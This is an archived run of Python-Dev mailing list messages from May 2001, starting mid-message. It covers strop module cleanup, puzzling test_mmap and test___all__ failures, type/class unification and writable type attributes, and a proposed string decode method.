ImportError it *ought* to get under Windows (and betting termios is the ultimate culprit). I've fixed enough of these. Somebody who thinks this is "a feature" gets to do it this time . From guido@digicool.com Thu May 10 14:43:07 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 08:43:07 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400." References: Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com> > [Guido] > > Yes, but in the mean time the fact that it's buggy doesn't bother > > me at all. Let it be as buggy as it always was -- that's one more > > reason to stop using it! :-) [Tim] > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names > that clearly started life as identical code. Over time they got out > of synch, and when they punched me in the face today, I had no idea > which was "right" and which "wrong". Turned out they both had the > same bug, and the clearest way to fix it in stringobject.c without > leaving a more inconsistent x-module mess was to bring the > once-common utility routines back into synch. Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied. > As /F said, though, the mymemreplace() approach is inefficient and > "should be" replaced wholesale. If that's done in stringobject.c > alone, great, then I won't care about the legacy routines in > stropmodule.c either. What I can't abide is having one copy of a > function in the codebase work and a clone of it not work -- unless > you can keep the undocumented history of both in your mind at all > times, you're just as likely to bump into the broken one first when > searching the code base, and if you're unlucky never even realize it > is "the broken one" (or, if you're lucky, bump into the good one > too, and then pee away time trying to understand the differences). Here's an idea. We remove stropmodule.c, and replace it with a strop.py that issues a warning and then imports selected things from string.py. The only complication is that there are a few constants and one function in strop that are still imported into string.py; I propose to move these to an "internal" extension module (e.g. "_string"). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 10 15:02:59 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 09:02:59 -0500 Subject: [Python-Dev] test_mmap failing? In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com> > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Strange. The *both* work for me with the latest CVS (and even after removing all *.pyc files!), although last night (?) I recall seeing a test_pty faulure too. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Thu May 10 15:16:24 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 10 May 2001 09:16:24 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: <15098.41656.128146.826459@beluga.mojam.com> Guido> Yes, but in the mean time the fact that it's buggy doesn't bother Guido> me at all. Let it be as buggy as it always was -- that's one Guido> more reason to stop using it! :-) In fact, perhaps the import warning could mention that strop is buggy and won't be fixed... :-) Skip From skip@pobox.com (Skip Montanaro) Thu May 10 15:32:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 10 May 2001 09:32:15 -0500 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: References: Message-ID: <15098.42607.84670.323361@beluga.mojam.com> >> python ../lib/test/regrtest.py test___all__ Tim> test___all__ Tim> test test___all__ failed -- tty has no __all__ attribute Tim> 1 test failed: test___all__ grumble, grumble... Tim> I assume this is yet another case where some excruciatingly Tim> non-obvious sequence of failing imports manages to leave behind a Tim> damaged module object in sys.modules that prevents test___all__'s Tim> import of tty from getting the ImportError it *ought* to get under Tim> Windows (and betting termios is the ultimate culprit). I (thankfully) gave up even pretending to run Windows recently, so I can only make a suggestion for others who look into this problem. Try this: Change test___all__.check_all so that the except clause reads: except ImportError, msg: then print out msg when an import fails. You should get the actual module that failed to import. If foo.py consists of simply "import bar", and I import it, I see that bar couldn't be imported: >>> try: ... import foo ... except ImportError, msg: ... print msg ... No module named bar Skip From fdrake@acm.org Thu May 10 15:57:59 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:57:59 -0400 (EDT) Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: References: Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Tim Peters writes: > But having suffered too many "impossible problems" the last 36 hours, my > confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under > current CVS? Fred, are you *sure* it fails for you -- if so, does the > problem actually go away if you revert mmapmodule.c? It was indeed showing the behavior I described! I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-) While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message. This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Thu May 10 15:59:08 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:59:08 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com> Jeremy Hylton writes: > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Or, I could just be working in an alternate universe altogether. I've been known to do that.... -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From paulp@ActiveState.com Thu May 10 22:55:36 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy@digicool.com Thu May 10 22:59:34 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. Jeremy From fdrake@cj42289-a.reston1.va.home.com Thu May 10 23:47:14 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 18:47:14 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update for the maintenance version docs. From fdrake@cj42289-a.reston1.va.home.com Fri May 11 00:04:40 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 19:04:40 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for the development version of the docs. From guido@digicool.com Fri May 11 01:03:13 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 19:03:13 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-) > -------- Original Message -------- > Log Message: > > Make attributes of subtypes writable, but only for dynamic subtypes > derived in Python using a class statement; static subtypes derived in > C still have read-only attributes. > -------- Original Message -------- > > I would like to argue that "plain old C types" should act as if they > have __dict__s for consistency with other types. Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes. I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__. > It is sometimes useful > to be able to annotate objects by adding attributes to them. But this > only works with class instance objects, not instances of types. > > Paul Prescod If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined). If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above. --Guido van Rossum (home page: http://www.python.org/~guido/) From paulp@ActiveState.com Fri May 11 00:22:16 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 16:22:16 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com> Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com> Jeremy Hylton wrote: > > >>>>> "PP" == Paul Prescod writes: > > PP> I would like to argue that "plain old C types" should act as if > PP> they have __dict__s for consistency with other types. It is > PP> sometimes useful to be able to annotate objects by adding > PP> attributes to them. But this only works with class instance > PP> objects, not instances of types. > > Every type should have an __dict__ of type dict? Then every dict > must have an __dict__, including the __dict__ of __dict__? What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries. > Once every object has an __dict__, every object will be mutable. Then > no object will be usable as a dict key and we can get rid of dict's > entirely. According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes! -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mwh@python.net Fri May 11 00:31:53 2001 From: mwh@python.net (Michael Hudson) Date: Fri, 11 May 2001 00:31:53 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10 Message-ID: This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list@python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the seventh summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 228 40 | [|] | [|] | [|] | [|] [|] | [|] [|] 30 | [|] [|] | [|] [|] | [|] [|] | [|] [|] | [|] [|] 20 | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039 Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08| Fri 27 Sun 29 Tue 01 Thu 03 Sat 05 Mon 07 Wed 09 A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary). * type == class? * Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk: He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider: class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method! This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground. Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them. The long term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is called superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated. So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped up super.foo() construct: To me, the most plausible ideas came from Thomas Heller: and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel: though the best syntax for the latter is far from clear. There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe? * data.decode * Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method: After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently. * Moving MacPython to sourceforge * Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge: It will be nice to finally have all the code in the same place! Cheers, M. From paulp@ActiveState.com Fri May 11 01:26:43 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 17:26:43 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Message-ID: <3AFB31C3.5CEF9064@ActiveState.com> Guido van Rossum wrote: > >... > > Good point. Plain old types currently (in the descr-branch) have a > readonly dict (using a proxy) and no settable attributes. I will > probably give types settable attributes in a next revision, but I > prefer not to make the type's dict writable -- I need to be able to > watch the setattr calls so that if someone changes > DictType.__getitem__ I can change the mp_subscript to a C function > that calls the __getitem__ method. I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about. >... > If you're talking about *instances*: instances of subtypes of built-in > types have a dict of their own to which you can add stuff to your > heart's content. Instances of built-in types will continue not to > have a dict (it would cost too much space if *every* object had a > dict, even if it was a NULL pointer when no attrs are defined). Darn. That *is* what I was hoping for. There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary. That's the usual workaround anyhow so this would be a nicer syntax and a more orthoganal model. Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido@digicool.com Fri May 11 02:57:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 20:57:36 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com> > > Good point. Plain old types currently (in the descr-branch) have a > > readonly dict (using a proxy) and no settable attributes. I will > > probably give types settable attributes in a next revision, but I > > prefer not to make the type's dict writable -- I need to be able to > > watch the setattr calls so that if someone changes > > DictType.__getitem__ I can change the mp_subscript to a C function > > that calls the __getitem__ method. > > I'm happy to have you look and see if I'm setting something magical. But > if I'm not, I would like you to just add the thing I made to an internal > private dictionary and remember it. I think that's what you are talking > about. OK, we agree on this one. > >... > > If you're talking about *instances*: instances of subtypes of built-in > > types have a dict of their own to which you can add stuff to your > > heart's content. Instances of built-in types will continue not to > > have a dict (it would cost too much space if *every* object had a > > dict, even if it was a NULL pointer when no attrs are defined). > > Darn. That *is* what I was hoping for. > > There is an implementation that is slowish if you use it, but has little > cost if you don't: keep a big dict mapping object pointers to their > associated dictionaries (if any). For purposes of discussion, call it > sys._associations. Then have the getattr on "PyObject" look in this dict > of dicts for attributes that it can't otherwise find, and setattr > construct dictionaries in the dict of dicts if necessary. > > That's the usual workaround anyhow so this would be a nicer syntax and a > more orthoganal model. > > Price: a hasattr that would return false or getattr that would raise > AttributeError would be a little slower. They would have to check the > dictionary of dictionaries before deciding that they really don't have > the attribute. Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Fri May 11 02:05:11 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 11 May 2001 13:05:11 +1200 (NZST) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com> Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz> Paul Prescod : > Otherwise > they have null pointers that "act as if" they were empty > dictionaries. Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From barry@digicool.com Fri May 11 04:45:38 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 23:45:38 -0400 Subject: [Python-Dev] Interview with Mark Lutz Message-ID: <15099.24674.311472.184935@anthem.wooz.org> Great interview with Mark on the ORA site, linked from /. http://python.oreilly.com/news/python_0501.html -Barry From fredrik@effbot.org Fri May 11 06:57:34 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 07:57:34 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid> barry wrote: > Great interview with Mark on the ORA site, linked from /. > > http://python.oreilly.com/news/python_0501.html you mean that python-devers read slashdot for python news, when you have the daily url: http://www.pythonware.com/daily Cheers /F From thomas@xs4all.net Fri May 11 10:02:26 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 11 May 2001 11:02:26 +0200 Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400 References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Message-ID: <20010511110226.M16486@xs4all.nl> On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote: [ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ] > This begs the question, though -- should tests that create temp > files check that the files don't already exist, and fail with a more > descriptive error if they do? I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ? -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Fri May 11 10:34:25 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:34:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AFBB221.F29BCB9A@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > I've attached the patch. Due to a small reorganisation the patch is > > a little longer -- symmetry has its price at C level too ;-) > > I may be being dense, but can you explain what's going on here: > > ->> u'\u00e3'.encode('latin-1') > '\xe3' > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > Traceback (most recent call last): > File "", line 1, in ? > UnicodeError: ASCII encoding error: ordinal not in range(128) The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range. > Can you come up with some other example I can use it tomorrow's > python-dev summary? I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as simple example. With those you will be able to write: data.encode('base64').decode('base64') and get back data. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Fri May 11 10:43:14 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 11:43:14 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid> mal wrote: > > I may be being dense, but can you explain what's going on here: > > > > ->> u'\u00e3'.encode('latin-1') > > '\xe3' > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > Traceback (most recent call last): > > File "", line 1, in ? > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > The string.decode() method will try to reuse the Unicode > codecs here. To do this, it will have to convert the string > to Unicode first and this fails due to the character not being > in the ASCII range. can you take that again? shouldn't michael's example be equivalent to: unicode(u"\u00e3".encode("latin-1"), "latin-1") if not, I'd argue that your "decode" design is broken, instead of just buggy... Cheers /F From mal@lemburg.com Fri May 11 10:50:24 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:50:24 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid> Message-ID: <3AFBB5E0.620710C8@lemburg.com> Fredrik Lundh wrote: > > barry wrote: > > > Great interview with Mark on the ORA site, linked from /. > > > > http://python.oreilly.com/news/python_0501.html > > you mean that python-devers read slashdot for python news, > when you have the daily url: > > http://www.pythonware.com/daily I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to setup a channel for this ? The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... anyway, just a thought ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 11 11:07:40 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 12:07:40 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> Message-ID: <3AFBB9EC.F75C158D@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > > I may be being dense, but can you explain what's going on here: > > > > > > ->> u'\u00e3'.encode('latin-1') > > > '\xe3' > > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > > Traceback (most recent call last): > > > File "", line 1, in ? > > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > > > The string.decode() method will try to reuse the Unicode > > codecs here. To do this, it will have to convert the string > > to Unicode first and this fails due to the character not being > > in the ASCII range. > > can you take that again? shouldn't michael's example be > equivalent to: > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > if not, I'd argue that your "decode" design is broken, instead > of just buggy... Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec return an Unicode object (which the .decode() method does). This is what's failing. Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?! (I would be in favour of this, but I'm not sure whether this is already in use by someone...) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 11 14:31:18 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 08:31:18 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com> Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> > > > Good point. Plain old types currently (in the descr-branch) have a > > > readonly dict (using a proxy) and no settable attributes. I will > > > probably give types settable attributes in a next revision, but I > > > prefer not to make the type's dict writable -- I need to be able to > > > watch the setattr calls so that if someone changes > > > DictType.__getitem__ I can change the mp_subscript to a C function > > > that calls the __getitem__ method. Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then then their types have to be shared too! Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000. Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g@Virginia.EDU Fri May 11 14:43:32 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 09:43:32 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> Message-ID: Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the lisp of real world uses of Don's Metaclass hack that Tim questioned. Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes. Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.) Classes are necessary for statically typed O-O languages, but IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'ld urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!) BTW: XlispStat, which has a prototype object system with multiple inheritence also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes. I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. ( There's no class variables -- there's no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases. -- Steve Majewski From nas@python.ca Fri May 11 15:06:39 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 11 May 2001 07:06:39 -0700 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700 References: Message-ID: <20010511070639.A1402@glacier.fnational.com> noreply@sourceforge.net wrote: > Module objects currently don't define the tp_getattro > or tp_setattro slots. As a result, interning of > attribute names does them no good: a char* is always > passed, so the dict lookup always needs to do a string > compare despite that the attribute name is interned. I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this? Neil From guido@digicool.com Fri May 11 16:13:56 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 10:13:56 -0500 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST." <20010511070639.A1402@glacier.fnational.com> References: <20010511070639.A1402@glacier.fnational.com> Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com> > I think this is a problem in classobject.c:generic_binary_op as > well. PyObject_GetAttrString is always used. I believe the old > code interned names like "__add__" and used PyObject_GetAttr. Is > it worth fixing this? Maybe. I'd give this low priority. If my descriptor branch work goes well, most of 